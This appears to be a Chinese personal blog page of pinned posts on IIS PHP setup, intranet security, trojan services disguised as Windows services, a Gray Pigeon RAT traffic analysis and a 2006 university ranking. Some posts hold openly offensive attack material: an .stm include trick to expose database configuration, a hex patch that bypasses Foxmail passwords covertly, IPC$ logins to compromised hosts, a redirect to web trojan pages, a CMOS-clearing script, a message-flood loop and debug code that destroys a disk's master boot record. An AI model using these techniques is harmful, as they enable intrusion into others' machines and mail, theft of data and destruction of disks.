博思咨询-人生规划,心理咨询
(作者置顶)
专注于心理成功管理教育,提供人生规划心理成功管理创业方面咨询,为你排忧解难,让我们一起欣赏世界……
教你IIS6的PHP最佳配置方法
(作者置顶)
虽然 LAMP 组合很不错,但是如果想要架设一台同时支持PHP、ASP、ASP.NET、JSP、Perl的Web虚拟主机服务器,还是用 Windows 2003的IIS 6最好。网上有很多介绍在IIS 6上配置PHP的文章,但是那些方法不是性能不好,就是升级麻烦。下面的方法可以让你在第一次配置好后,能够非常方便的进行升级。
这里所说的升级,是指从某个php4版本升级到另一个php4版本,或者从某个php5版本升级到另一个php5版本,而不是指从php4升级到php5。
准备:
1、一台安装好的 Windows 2003 服务器,并且已经安装了 IIS 6。
2、下载 windows 版的 PHP 二进制压缩包
安装:
解压缩 PHP 二进制压缩包到 C:\php 目录下(这里假设 C: 盘是系统盘,即安装了Windows 系统的盘,如果系统盘是 D: 盘,则解压缩到 D:\php 目录下,以此类推,下同)。
然后打开“我的电脑”->“属性”->“高级”->“环境变量”->“系统变量”->“path”,编辑其值,在前面增加下面的路径地址:
C:\php;C:\php\dlls;C:\php\extensions;C:\php\sapi;
将 php.ini-dist 或 php.ini-recommended 复制到 C:\Windows 目录下,并改名为 php.ini,一般正式发布网站的服务器用 php.ini-dist,而作为调试用的服务器用 php.ini-recommended 更好。当然一般情况下,这个 php.ini 还是需要根据实际情况来修改的。
下面来介绍一下几个必要的修改选项:
extension_dir = "C:\php\extensions"
这个是 PHP 扩展所放置的目录,请确保跟你实际安装的目录相同。
extension=php_mbstring.dll
;extension=php_big_int.dll
extension=php_bz2.dll
extension=php_cpdf.dll
extension=php_crack.dll
extension=php_curl.dll
extension=php_db.dll
extension=php_dba.dll
extension=php_dbase.dll
extension=php_dbx.dll
extension=php_domxml.dll
;extension=php_exif.dll
;extension=php_fdf.dll
;extension=php_filepro.dll
extension=php_gd2.dll
extension=php_gettext.dll
extension=php_hyperwave.dll
extension=php_iconv.dll
;extension=php_ifx.dll
;extension=php_iisfunc.dll
extension=php_imap.dll
;extension=php_interbase.dll
extension=php_java.dll
extension=php_ldap.dll
;extension=php_mcrypt.dll
extension=php_mhash.dll
extension=php_mime_magic.dll
extension=php_ming.dll
extension=php_mssql.dll
extension=php_msql.dll
;extension=php_oci8.dll
extension=php_openssl.dll
;extension=php_oracle.dll
extension=php_pdf.dll
extension=php_pgsql.dll
;extension=php_printer.dll
extension=php_shmop.dll
;extension=php_snmp.dll
extension=php_sockets.dll
;extension=php_sybase_ct.dll
extension=php_w32api.dll
extension=php_xmlrpc.dll
extension=php_xslt.dll
extension=php_yaz.dll
extension=php_zip.dll
上面这些,开头没有加分号的是打开的扩展,加了分号的是没有打开的扩展。上面的设置包含了在 Windows 2003 上默认安装情况下可以打开所有扩展(这里列出的是 php 4 的)。
session.save_path = c:\sessions
这个是 session 文件默认保存的目录,这个目录必须是一个存在的目录,不然默认的 session 功能会无效。我这里设置的是一个 ramdisk 上的一个目录。将 session.save_path 设置在 ramdisk 上可以加快 session 处理的速度。如果你没有安装 ramdisk,你可以把它指定到其他盘的任何一个目录下,如 C:\sessions 目录、C:\Windows\Temp 目录等。
OK,基本工作作完了,现在该配置 IIS 了。
打开“ Internet 信息服务(IIS)管理器”,在“ Web 服务扩展”里,选择“添加一个新的 Web 服务扩展”,扩展名可填写“PHP ISAPI 扩展”,要求的文件选择:C:\php\sapi\php4isapi.dll(如果安装的是 PHP5,则此处是 C:\php\sapi\php5isapi.dll,下同),并设置扩展状态为允许。
打开“网站”->“属性”->“ISAPI 筛选器”->“添加”,筛选器名称可填写“PHP”,可执行文件仍然选择 C:\php\sapi\php4isapi.dll。
打开“网站”->“属性”->“主目录”->“应用程序设置”->“配置”->“应用程序扩展”->“添加”,可执行文件还是选择 C:\php\sapi\php4isapi.dll。扩展名填写“.php”,动作限制为“HEAD,GET,POST”。
打开“网站”->“属性”->“文档”->“启用默认内容文档”->“添加”,可以将 index.php 添加为默认内容文档。
然后选择“服务器机器名”->“所有任务”->“重新启动 IIS”来重启 IIS。
测试
在默认网站发布目录下,建立一个测试页面:
下载:phptest.php
phpinfo();
?>
如果打开这个页面能够看到 php 安装配置信息,就算是安装成功了。
如果想要更优化的执行 php 程序,可以安装 ZendOptimizer-2.6.0-Windows-i386.exe ,这个东西安装非常简单,这里就不介绍了。
升级
现在升级就非常简单了。只需要将新版本的 PHP 二进制压缩包下载下来,将原来的 C:\php 目录删除,将新版本解压缩到 C:\php 目录中,然后重新启动一下 IIS 就可以了。不需要修改任何配置,也不需要往 System32 目录中复制任何文件。是不是很方便啊?
当网站不允许上传asp,cer,cdx,htr时的办法
(作者置顶)
| HTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* HTTP_ACCEPT_LANGUAGE:zh-cn HTTP_CONNECTION:Keep-Alive HTTP_HOST:localhost HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322) HTTP_COOKIE:nbblastactivity=1100263629; bblastvisit=1100264583; bblastactivity=1100265530; bbuserid=1; bbpassword=0f8514d1ed2eaa91fb9a87a568f6c96f; ASPSESSIONIDAQTSDRQQ=JOGDCEBDCNKFMLGDNFHPDHMJ HTTP_ACCEPT_ENCODING:gzip, deflate 当前文件名称:F:\Web\1.stm Web服务器的名称和版本:Microsoft-IIS/5.0 主机名:localhost 端口:80 客户或客户代理IP地址:127.0.0.1 客户或客户代理主机名:127.0.0.1 PATH_INFO 的值,但带有扩展为某个目录规范的虚拟路径:F:\Web\1.stm 客户端给出附加路径信息:/1.stm image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* |
| Quoted from Unkown: |
当网站不允许上传asp cer cdx htr等文件时, 上传一个stm文件, 内容为: <!--#include file="conn.asp"--> 直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦! |
| <!--#include file="ok.asp"--> |
黑客技术:与你分享十大黑客锦囊妙计
(作者置顶)
1.简化CMD下用IPC$登录肉鸡的操作
用记事本建立一个名为login.bat文件,代码如下:
@net use $">\\%1\ipc$Content$nbsp;%3 /u:"%2"
@echo OK!连接已经建立成功!
使用方法是在CMD下输入:login.bat肉鸡的IP肉鸡的ADMIN组的帐号名/用户的密码。这样我们以后用IPC$登录肉鸡就不用每次都输入一大串的命令了。
2.进入Foxmail账户有妙招
在Foxmail中可以为账户加上访问密码,如果没有密码却想进入别人的信箱该怎么办呢?一个众所周知的办法是:打开Foxmail文件夹下以账户名命名的任意一个文件夹,里边有个名为account.stg的文件,把它复制到你想进入的账户目录里,直接覆盖该目录下原来的account.stg文件。运行Foxmail,点击那个忘记了密码的账户,可以直接进入该信箱!但是上面的方法并不隐蔽,因为对方下次使用信箱时就会发现你破解了他的信箱,这样不够隐蔽。要想进入对方的信箱还不被对方发现,可以使用下面这个办法:用16进制文件编辑器UltraEdit打开Foxamil的主程序foxmail.exe文件,按组合键Alt+F3查找以下的代码:E8617EE4FF7515,单击"确定"开始查找,找到后把其中的7515改为9090,其他代码不用改,然后保存就可以了。执行foxmail.exe,这样可以随意进入设有密码的Foxmail邮箱。该技巧对最新的Foxmail5.0.500.0有效。
3.利用vbs脚本判断对方的IE版本
我们在编制网页木马时,常常需要页面具有自动判别对方IE版本的能力,根据版本的不同,跳转到不同的网页木马页面。之所以这样做,是因为不同版本的IE,其木马网页的制作方法并不相同,比方说针对IE6.0版的网页木马制作方法与其下各个版本就不相同。
打开记事本,输入如下内容:
〈SCRIPT language=vbscript〉
if Instr(window.navigator.appversion,"MSIE 6.0")>0 then
alert("浏 览 器:Internet Explorer 6.0")
window.location.href="http://IE6.0 网页木马页面"
else
alert("浏 览 器:6.0版本以下")
window.location.href="http://IE6.0 以下版网页木马页面"
end if
〈/SCRIPT〉
这样,使用IE6.0的用户浏览了该页面后,会自动跳转到http://IE6.0网页木马页面,不是IE6.0的用户浏览后会自动跳转到http://IE6.0以下版网页木马页面。
4.肉鸡的ipc$打不开该怎么办
有些朋友反映telnet到对方的机器后却不能打开ipc$,这该怎么办呢?我的做法是首先试试net share命令,看能不能使用,如果不能使用,说明对方没有安装文件和打印机共享服务,那ipc$一定是无法使用,此时只能放弃了。再输入net share ipc$试试,看看ipc$能不能打开,如果不行就输入net stop server,接下来再输入net start server,这样试试看ipc$能不能打开。如果net stop server不能执行,先把其附属进程关闭,再关server的主进程,一般到此ipc$多半可以连接上了。如果还是不行,那多半是对方有防火墙,这时只能想办法杀掉防火墙的进程了。
5.用vbs脚本结束进程
先声明这一招不是我自己想到的,是从高手ilovewen那里学来的。把下面的内容保存为.vbs脚本,在Windows2000下可以运行成功,代码内容如下:
On Error Resume Next
strComputer="."Set objWMIService = GetObject("winmgmts:" _
&& "!\\" && strComputer && "\root\cimv2")Set colProcessList
=objWMIService.ExecQuery _
("select * from Win32_Process where Name=’*.exe’")For Each objProcess in colProcessList
objProcess.Terminate()Next
其中*.exe是你要结束的进程,将它改为你要结束进程的名即可。
6.利用批处理清除对方的CMOS内容
如果你想清除对方的CMOS内容该怎么办?方法有很多了,利用批处理绝对是很另类的一招吧?请打开记事本,在文件中输入如下内容:
Const ForAppending=8
Dim fso,x,y
Set fso=createObject("Scripting.FileSystemObject")
Set x=fso.OpenTextFile("c:\autoexec.bat", ForAppending, True)
Set y=fso.createTextFile("c:\1.txt", True)
x.WriteBlankLines(1)
x.Write"debug<1.txt"
x.WriteBlankLines(1)
y.WriteLine("o 70 10")
y.WriteBlankLines(1)
y.Write("o 71 10")
y.Close
x.Close
把上述内容保存为.bat文件,然后拷贝到对方的电脑上运行即可。它的作用是向Autoexec.bat中加入数据,创建一个文件,并向其中写入内容,在他下次开机时调用debug清除掉CMOS设置,包括CMOS密码。其实,这与大家常用的清除CMOS密码的方法很相象,通常情况下清除CMOS密码的方法是在DOS状态下输入debug,回车之后输入如下命令即可手工清除密码:
-o 70 10
-o 71 01
-q
7.利用批处理轰炸对方电脑
这是从一些高手那里学来的招数,呵呵,真是好方法。具体步骤是,打开记事本,在里面输入如下内容:
@echo 正在轰炸中……
:start
@net send %1 %2
@if errorlevel 1 goto over
goto start
:over
@echo 发送失败:(
将其保存为任意名字的.bat文件即可。使用用法是:任意名字的.bat+空格+目标IP地址+空格+你要对他说的话
8.戏弄非法用户
为防止有人胡乱使用自己的电脑,我们可以利用批处理文件来戏弄一下非法用户。方法是用记事本程序在Windows目录中建立一个Winstart.bat文件,并在该文件中加入以下命令:
@echo off
echo non-system disk or disk error
choice/c:&&/n
上面代码中的"&&"为我们设置的密码,您可以自行设置。这样重新启动计算机开机时就会显示"non-system disk or disk error",接着光标一闪一闪的好像死机了一样,造成非法用户以为Windows死机的假象。有时就连高手也会上当受骗!当我们要进入系统时,只要输入"&&"即可。
9.破坏硬盘主引导扇区
如果你有机会接触对方的电脑,无论是否是物理接触都可以,只要能在对方的电脑上运行下面这些代码,就可以破坏对方硬盘主引导扇区,象病毒一样厉害。方法是运行debug,然后输入:
a 100
mov ax,301
mov bx,1000
mov cx,1
mov dx,80
int 13
g=100 10e
10.我的电脑你别用
如果你不想让别人使用你的电脑,又不好意思说,那该怎么办呢?在CMOS中设密码,太小气了吧?他如果问你密码,你好意思不说吗?其实,我们可以用下面这个办法来欺骗一下他的眼睛,使他人以为电脑坏了。
方法是:进入MS-DOS方式或CMD窗口下,输入:copy con null.sys,按一下回车键,然后什么也别输入,再按一次回车键,按Ctrl+Z或按F6键,屏幕上会显示^z,按一下回车键,屏幕上会显示"1 file(s) copied",这样就一个名为null.sys的空文件就建好了。现在,找到C盘根目录下的config.sys文件,注意这个文件是隐藏属性,所以必须进入"我的电脑"中,点击"查看(v)"→"文件夹选项"→"查看"→"显示所有文件"才能看到它,然后右键单击该文件,在弹出菜单中选择"用记事本打开",接下来在config.sys文件中加入:device=c:\null.sys /d:null这样一行,保存修改结果,退出记事本。以后,你的电脑就会在出现Windows的启动画面时自动重新启动,如此反复下去,别人一定以为你的电脑出问题了,而你就可以偷偷乐了。
网络人员注意:内网安全技术十大策略
(作者置顶)
几乎所有企业对于网络安全的重视程度一下子提高了,纷纷采购防火墙等设备希望堵住来自Internet的不安全因素。然而,Intranet内部的攻击和入侵却依然猖狂。事实证明,公司内部的不安全因素远比外部的危害更恐怖。
大多企业重视提高企业网的边界安全,暂且不提它们在这方面的投资多少,但是大多数企业网络的核心内网还是非常脆弱的。企业也对内部网络实施了相应保护措施,如:安装动辄数万甚至数十万的网络防火墙、入侵检测软件等,并希望以此实现内网与Internet的安全隔离,然而,情况并非如此!企业中经常会有人私自以Modem拨号方式、手机或无线网卡等方式上网,而这些机器通常又置于企业内网中,这种情况的存在给企业网络带来了巨大的潜在威胁,从某种意义来讲,企业耗费巨资配备的防火墙已失去意义。这种接入方式的存在,极有可能使得黑客绕过防火墙而在企业毫不知情的情况下侵入内部网络,从而造成敏感数据泄密、传播病毒等严重后果。实践证明,很多成功防范企业网边界安全的技术对保护企业内网却没有效用。于是网络维护者开始大规模致力于增强内网的防卫能力。
下面给出了应对企业内网安全挑战的10种策略。这10种策略即是内网的防御策略,同时也是一个提高大型企业网络安全的策略。
1、注意内网安全与网络边界安全的不同
内网安全的威胁不同于网络边界的威胁。网络边界安全技术防范来自Internet上的攻击,主要是防范来自公共的网络服务器如HTTP或SMTP的攻击。网络边界防范(如边界防火墙系统等)减小了资深黑客仅仅只需接入互联网、写程序就可访问企业网的几率。内网安全威胁主要源于企业内部。恶性的黑客攻击事件一般都会先控制局域网络内部的一台Server,然后以此为基地,对Internet上其他主机发起恶性攻击。因此,应在边界展开黑客防护措施,同时建立并加强内网防范策略。
2、限制VPN的访问
虚拟专用网(VPN)用户的访问对内网的安全造成了巨大的威胁。因为它们将弱化的桌面操作系统置于企业防火墙的防护之外。很明显VPN用户是可以访问企业内网的。因此要避免给每一位VPN用户访问内网的全部权限。这样可以利用登录控制权限列表来限制VPN用户的登录权限的级别,即只需赋予他们所需要的访问权限级别即可,如访问邮件服务器或其他可选择的网络资源的权限。
3、为合作企业网建立内网型的边界防护
合作企业网也是造成内网安全问题的一大原因。例如安全管理员虽然知道怎样利用实际技术来完固防火墙,保护MS-SQL,但是Slammer蠕虫仍能侵入内网,这就是因为企业给了他们的合作伙伴进入内部资源的访问权限。由此,既然不能控制合作者的网络安全策略和活动,那么就应该为每一个合作企业创建一个DMZ,并将他们所需要访问的资源放置在相应的DMZ中,不允许他们对内网其他资源的访问。
4、自动跟踪的安全策略
智能的自动执行实时跟踪的安全策略是有效地实现网络安全实践的关键。它带来了商业活动中一大改革,极大的超过了手动安全策略的功效。商业活动的现状需要企业利用一种自动检测方法来探测商业活动中的各种变更,因此,安全策略也必须与相适应。例如实时跟踪企业员工的雇佣和解雇、实时跟踪网络利用情况并记录与该计算机对话的文件服务器。总之,要做到确保每天的所有的活动都遵循安全策略
5、关掉无用的网络服务器
大型企业网可能同时支持四到五个服务器传送e-mail,有的企业网还会出现几十个其他服务器监视SMTP端口的情况。这些主机中很可能有潜在的邮件服务器的攻击点。因此要逐个中断网络服务器来进行审查。若一个程序(或程序中的逻辑单元)作为一个window文件服务器在运行但是又不具有文件服务器作用的,关掉该文件的共享协议。
6、首先保护重要资源
若一个内网上连了千万台(例如30000台)机子,那么要期望保持每一台主机都处于锁定状态和补丁状态是非常不现实的。大型企业网的安全考虑一般都有择优问题。这样,首先要对服务器做效益分析评估,然后对内网的每一台网络服务器进行检查、分类、修补和强化工作。必定找出重要的网络服务器(例如实时跟踪客户的服务器)并对他们进行限制管理。这样就能迅速准确地确定企业最重要的资产,并做好在内网的定位和权限限制工作。
7、建立可靠的无线访问
审查网络,为实现无线访问建立基础。排除无意义的无线访问点,确保无线网络访问的强制性和可利用性,并提供安全的无线访问接口。将访问点置于边界防火墙之外,并允许用户通过VPN技术进行访问。
8、建立安全过客访问
对于过客不必给予其公开访问内网的权限。许多安全技术人员执行的“内部无Internet访问”的策略,使得员工给客户一些非法的访问权限,导致了内网实时跟踪的困难。因此,须在边界防火墙之外建立过客访问网络块。
9、创建虚拟边界防护
主机是被攻击的主要对象。与其努力使所有主机不遭攻击(这是不可能的),还不如在如何使攻击者无法通过受攻击的主机来攻击内网方面努力。于是必须解决企业网络的使用和在企业经营范围建立虚拟边界防护这个问题。这样,如果一个市场用户的客户机被侵入了,攻击者也不会由此而进入到公司的R&D。因此要实现公司R&D与市场之间的访问权限控制。大家都知道怎样建立互联网与内网之间的边界防火墙防护,现在也应该意识到建立网上不同商业用户群之间的边界防护。
10、可靠的安全决策
网络用户也存在着安全隐患。有的用户或许对网络安全知识非常欠缺,例如不知道RADIUS和TACACS之间的不同,或不知道代理网关和分组过滤防火墙之间的不同等等,但是他们作为公司的合作者,也是网络的使用者。因此企业网就要让这些用户也容易使用,这样才能引导他们自动的响应网络安全策略。
另外,在技术上,采用安全交换机、重要数据的备份、使用代理网关、确保操作系统的安全、使用主机防护系统和入侵检测系统等等措施也不可缺少。
对付假扮系统服务木马的有效解决办法
(作者置顶)
小知识 什么是服务
服务是一种应用程序类型,它在后台运行。要管理系统服务,请运行services.msc,打开“服务”对话窗口,这里可以看到当前系统中的所有服务。双击某一服务,在弹出的“属性”对话框的“常规”选项页中的“服务状态”栏可以看到此服务当前状态。单击“启动类型”下拉菜单,可以将该服务设置为自动启动、手动启动或禁用。
有道是:知己知彼方能百战百胜,要想应付这类木马,就得知道它是如何变脸为服务,来长期潜伏作恶的。一般说来,根据木马变脸的方法不同,通常可以从两方面去做相应防范:
一、小心Windows成为木马的帮凶
Windows的“服务”工具是不能添加/删除服务的,但可以利用Windows提供的资源工具包中的Instsrv.exe和Srvany.exe来实现。其中,Instsrv.exe可以给系统安装和删除服务,Srvany.exe可以让程序以服务的方式运行。
★变脸原理
第一步:报户口——注册服务名称
这里就以建立一个名为explorer的服务为例来说明,首先将Instsrv.exe和Srvany.exe存放到一个比较方便的地方,建议放到系统安装目录中(笔者的Windows XP安装目录为D:\Windows)。运行cmd.exe,进入“命令提示符”窗口,执行命令:cd d:\Windows,进入系统安装目录。运行命令:
Instsrv explorer d:\Windows\srvany.exe
好了,这条命令的成功运行,已经在系统中注册了一个名叫explorer的服务,快到“服务”中看看一下检验检验吧!
小提示
★注册服务:instsrv
★删除服务:instsrv
第二步:找关联——后门服务
要让explorer服务正常运行,还必须在注册表中指定该服务对应的应用程序。运行Regedit.exe,打开“注册表编辑器”,依次展开如下子键:[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services],在该子键下找到并右击explorer(对应前面建立的服务名),选择“新建”下的“项”,将其命名为Parameters。单击选定它,在右侧窗口中新建一个名为Application的字符串值,将其数值数据设置为explorer服务对应的应用程序绝对路径,比如:d:\Windows\gboor.exe。接着再新建两个字符串值:AppDirectory和AppParameters,AppDirectory指定程序所在的目录,AppParameters指明程序运行的参数(注意:可以不用设值),如图1所示,最后关闭注册表编辑器。

接下来打开“服务”窗口,找到刚添加的explorer服务,打开其属性对话框,单击切换到“登录”选项页,在“登录身份”中选中“本地系统账户”,如图2,如果不想让服务在运行的时候弹出状态窗口,请不要勾选“允许服务与桌面交互”复选项,单击“确定”返回。至此,explorer服务已经全部配置好了。

最后,右击该服务,选择“启动”,这样该程序就会启动,而且以后也会在系统启动时自动以服务形式运行!
小提示
也可以通过命令来启动服务:net start explorer。
★赶走“后门服务”没商量
弄清了木马变服务的伎俩,解决起来就不难了。如果发现系统出现异常,可以到“服务”窗口中进行查看,一旦发现这种恶意的“后门服务”,驱鬼的也仅仅是两步:①停止服务。所用的命令是:net stop 服务名称,例如:net stop explorer。②彻底删除伪服务,把这些险恶的“后门服务”赶出家门,命令为:instsrv.exe 服务名称 remove,例如:nstsrv.exe explorer remove。
二、小心木马变服务的始作俑者
有些木马利用一款名为AppToService的小软件来变服务。该软件可以将任何应用程序作为 NT系统的服务来运行,而且操作起来更简单。
★变脸原理
安装好AppToService V2.7后,直接双击运行桌面上的快捷方式AppToService,即可按相应的提示进行操作。
举个例子,如果想要把程序d:\Windows\gdoor.exe添加成服务,并将其“服务类型”设置为“自动”,只要运行命令:Apptoservice /install /absname:"bd" /startup:A "d:\Windows\gdoor.exe",就可成功新建bd服务。启用服务的方法相同即net start bd。
★以牙还牙制服“后门服务”
如果发现一些木马借AppToService变脸为服务,可以运行如下命令来停止全部AppToService服务:AppToService /StopAll。接着再来删除它,要删除某一服务,请运行命令:AppToService /Remove 当前已存在的某个服务名称,比如:AppToService /remove bd,删除全部AppToService服务的命令为:AppToService /RemoveAll。
小提示
AppToService服务指的是所有通过AppToService添加的服务,不是指系统原有服务。
怎么样?知道了木马变服务的真实内幕了吧,相信有了上面的知识,再遇到后门服务,应该是手到擒来了吧!
声明:本文分析木马变服务过程,仅为了找出相应的防范办法。切勿模仿!
经典 教你如何通过路由器来控制上网
(作者置顶)
用iris分析中鸽子后的反入侵
(作者置顶)
首先要介绍一下软件
1.netlimiter 2 pro===主要的作用是查看每个进程的连接。。可以看到进程开启的端口。与外界相连接时的本地和远端的端口。当然还可以限制流量。。关闭指定的线程等。。具体就大家去开发了。。
2.Iris=========相信你上网去google一下就知道这是很出名的嗅探器。。作用就不用说了。。就是抓包。。
3.iceSword冰刃=====别告诉我你没有这款经典的工具。。我主要用它来看查隐藏的进程。文件。。注册表项。
4.灰鸽子 [Version 2.03]====这个就不多说了。
先看一下。。没中招前的服务。。相信大家都是用2000以上的系统了吧。。所以关于在98下面不以服务启动的鸽子就不讨论了。。
服务1.gif
空间。。更改他的ip.txt 文件。。让对方的鸽子飞到你这里来。。呵呵。。就看你的本事有多大了。。
做这个分析用了我两个晚上。。原因没别的。。昨天晚上。。单就找一个合用的iris就找了老半天。以前我也下载过。但是在连接上网络的情况下面就是注册不了。。。好不容易。。问网友:凌三少。。发了个3.7版的过来。。凑合着用。。但旧版的包解码。不及4.07的详细。。。搞来搞去在黑基软件中找到了也是4.07的。。不过。。是带注册机了。。看了上面的说明。。才明白我一直装不上。。原来是网络更新作的怪吧。。好了。。不多说了。。大家如果有兴趣自己去研究一下。。我分析的那32个数据包。。我也打包上来了。。方便大家用iris对照着来学习。。这个分析个人觉得还不错。。不但分析出了放鸽子的一些重要资料。。也让大家对tcp/ip协议的工作原理有个较清晰的了解。。
by the way。。我原本是想用iris分析出鸽子的连接密码的。。但是实际分析中。。却没抓到本机的服务端与本机的客户端的连接。。怪我功力不够。。最后也想请教一下高手:如何让隐藏的进程现身。。我的意思是让它变成普通的进程。。以方便用嗅探类的软件去分析它。。这个问题我事前也google过了。。没收获。。在有问必答里也发了贴。。希望大家都来关注一下这个问题。。谢谢
发表了才发现自己没有上传附件的权限。。晕哦。。
那些包我就抓图吧。。






2006中国大学100强
(作者置顶)
排名 | 校 名 | 总得分 | 人才培养 | 科学研究 | 分省排名 | 学校类型 | 学校参考类型 | ||||||
得分 | 研究生 培养 | 本科生培养 | 得分 | 自然科学研究 | 社会科学研究 | ||||||||
| 1 | 清华大学 | 267.6 | 113 | 82.94 | 29.93 | 155 | 135.1 | 18.1 | 京 | 1 | 理工 | 工学类 | 研究1型 |
| 2 | 北京大学 | 226.6 | 102 | 64.8 | 37.32 | 124 | 89.58 | 33.75 | 京 | 2 | 综合 | 综合类 | 研究1型 |
| 3 | 浙江大学 | 208 | 93 | 59.92 | 33.39 | 115 | 94.73 | 18.92 | 浙 | 1 | 综合 | 综合类 | 研究1型 |
| 4 | 上海交通大学 | 160 | 72 | 47.69 | 24.02 | 88.3 | 82.06 | 5.37 | 沪 | 1 | 综合 | 理科类 | 研究1型 |
| 5 | 复旦大学 | 138.9 | 65 | 38.83 | 25.92 | 74.1 | 51.86 | 21.55 | 沪 | 2 | 综合 | 综合类 | 研究1型 |
| 6 | 南京大学 | 125.8 | 59 | 34.93 | 24.16 | 66.7 | 46.21 | 19.9 | 苏 | 1 | 综合 | 综合类 | 研究1型 |
| 7 | 华中科技大学 | 114.1 | 54 | 31.68 | 22.37 | 60 | 52.26 | 7.2 | 鄂 | 1 | 理工 | 理科类 | 研究1型 |
| 8 | 武汉大学 | 109.7 | 52 | 30.33 | 21.17 | 58.2 | 39.42 | 18.2 | 鄂 | 2 | 综合 | 综合类 | 研究2型 |
| 9 | 吉林大学 | 98.93 | 49 | 25.99 | 22.55 | 50.4 | 41.06 | 8.86 | 吉 | 1 | 综合 | 综合类 | 研究2型 |
| 10 | 中山大学 | 96.45 | 41 | 28.56 | 12.29 | 55.6 | 43.76 | 11.32 | 粤 | 1 | 综合 | 综合类 | 研究1型 |
| 11 | 四川大学 | 93.58 | 42 | 26.8 | 14.92 | 51.9 | 40.19 | 11.19 | 川 | 1 | 综合 | 综合类 | 研究1型 |
| 12 | 西安交通大学 | 91.15 | 44 | 25.2 | 18.36 | 47.6 | 38.26 | 8.89 | 陕 | 1 | 综合 | 文理类 | 研究2型 |
| 13 | 中国科学技术大学 | 88.87 | 40 | 25.73 | 14.72 | 48.4 | 45.43 | 2.54 | 皖 | 1 | 理工 | 理科类 | 研究1型 |
| 14 | 哈尔滨工业大学 | 83.59 | 39 | 23.03 | 15.97 | 44.6 | 41.98 | 2.19 | 黑 | 1 | 理工 | 工学类 | 研究2型 |
| 15 | 山东大学 | 77.93 | 39 | 20.2 | 18.66 | 39.1 | 31.58 | 7.13 | 鲁 | 1 | 综合 | 综合类 | 研究1型 |
| 16 | 天津大学 | 72.56 | 33 | 20.83 | 12.17 | 39.6 | 36.05 | 3.14 | 津 | 1 | 理工 | 工学类 | 研究1型 |
| 17 | 南开大学 | 66.22 | 30 | 18.86 | 10.9 | 36.5 | 21.68 | 14.44 | 津 | 2 | 综合 | 综合类 | 研究1型 |
| 18 | 中南大学 | 63.14 | 31 | 17.12 | 13.98 | 32 | 29.73 | 2.01 | 湘 | 1 | 综合 | 理科类 | 研究2型 |
| 19 | 北京师范大学 | 61.95 | 28 | 17.74 | 10.14 | 34.1 | 15.04 | 18.71 | 京 | 3 | 师范 | 文理类 | 研究1型 |
| 20 | 中国协和医科大学 | 55.46 | 22 | 19.13 | 2.41 | 33.9 | 33.59 | 0.01 | 京 | 4 | 医药 | 医学类 | 研究1型 |
| 21 | 厦门大学 | 52.3 | 22 | 15.47 | 6.69 | 30.1 | 15.44 | 14.42 | 闽 | 1 | 综合 | 综合类 | 研究2型 |
| 22 | 东南大学 | 49.99 | 23 | 13.75 | 9.66 | 26.6 | 22.89 | 3.44 | 苏 | 2 | 综合 | 工学类 | 研究2型 |
| 23 | 北京航空航天大学 | 49.59 | 21 | 14.46 | 7.01 | 28.1 | 26.02 | 1.84 | 京 | 5 | 理工 | 工学类 | 研究2型 |
| 24 | 中国人民大学 | 47.97 | 22 | 13.75 | 7.76 | 26.5 | 0.42 | 25.79 | 京 | 6 | 综合 | 文科类 | 研究2型 |
| 25 | 华南理工大学 | 47.52 | 22 | 13.01 | 8.8 | 25.7 | 23.73 | 1.74 | 粤 | 2 | 理工 | 工学类 | 研究1型 |
| 26 | 同济大学 | 46.2 | 22 | 12.67 | 9.46 | 24.1 | 21.77 | 2.08 | 沪 | 3 | 理工 | 工学类 | 研究2型 |
| 27 | 大连理工大学 | 45.71 | 22 | 12.43 | 9.74 | 23.5 | 21.7 | 1.62 | 辽 | 1 | 理工 | 工学类 | 研究2型 |
| 28 | 西北工业大学 | 44.5 | 20 | 12.53 | 7.75 | 24.2 | 23.48 | 0.51 | 陕 | 2 | 理工 | 工学类 | 研究2型 |
| 29 | 重庆大学 | 39.13 | 22 | 8.55 | 13.81 | 16.8 | 14.83 | 1.78 | 渝 | 1 | 综合 | 工学类 | 研究2型 |
| 30 | 中国农业大学 | 38.23 | 17 | 10.75 | 6.35 | 21.1 | 19.47 | 1.46 | 京 | 7 | 农林 | 理科类 | 研究1型 |
| 31 | 东北大学 | 37.16 | 18 | 9.8 | 8.48 | 18.9 | 16.81 | 1.89 | 辽 | 2 | 理工 | 工学类 | 研究2型 |
| 32 | 华东师范大学 | 36.99 | 17 | 10.3 | 6.91 | 19.8 | 8.19 | 11.41 | 沪 | 4 | 师范 | 文理类 | 研究2型 |
| 33 | 兰州大学 | 36.5 | 18 | 9.12 | 8.9 | 18.5 | 15.41 | 2.9 | 甘 | 1 | 综合 | 理学类 | 研究2型 |
| 34 | 中国地质大学 | 33.55 | 17 | 8.63 | 8.18 | 16.7 | 15.96 | 0.62 | 鄂 | 3 | 理工 | 理科类 | 研究2型 |
| 35 | 北京理工大学 | 31.3 | 14 | 8.57 | 5.79 | 16.9 | 16.03 | 0.75 | 京 | 8 | 理工 | 工学类 | 研究2型 |
| 36 | 华东理工大学 | 30.95 | 14 | 8.58 | 5.25 | 17.1 | 16.54 | 0.41 | 沪 | 5 | 理工 | 工学类 | 研究1型 |
| 37 | 中国石油大学 | 30.09 | 15 | 7.64 | 7.16 | 15.3 | 15.09 | 0.35 | 京 | 9 | 理工 | 工学类 | 研教型 |
| 38 | 苏州大学 | 29.39 | 15 | 7.03 | 8 | 14.4 | 9.2 | 5.28 | 苏 | 3 | 综合 | 综合类 | 研教型 |
| 39 | 郑州大学 | 29.19 | 20 | 4.46 | 15.48 | 9.25 | 6.97 | 2.37 | 豫 | 1 | 综合 | 综合类 | 研教型 |
| 40 | 湖南大学 | 28.26 | 15 | 6.79 | 8.34 | 13.1 | 9.68 | 3.57 | 湘 | 2 | 综合 | 文理类 | 研教型 |
| 41 | 中国矿业大学 | 27.8 | 16 | 6.42 | 9.11 | 12.3 | 11.31 | 1.07 | 苏 | 4 | 理工 | 工学类 | 研教型 |
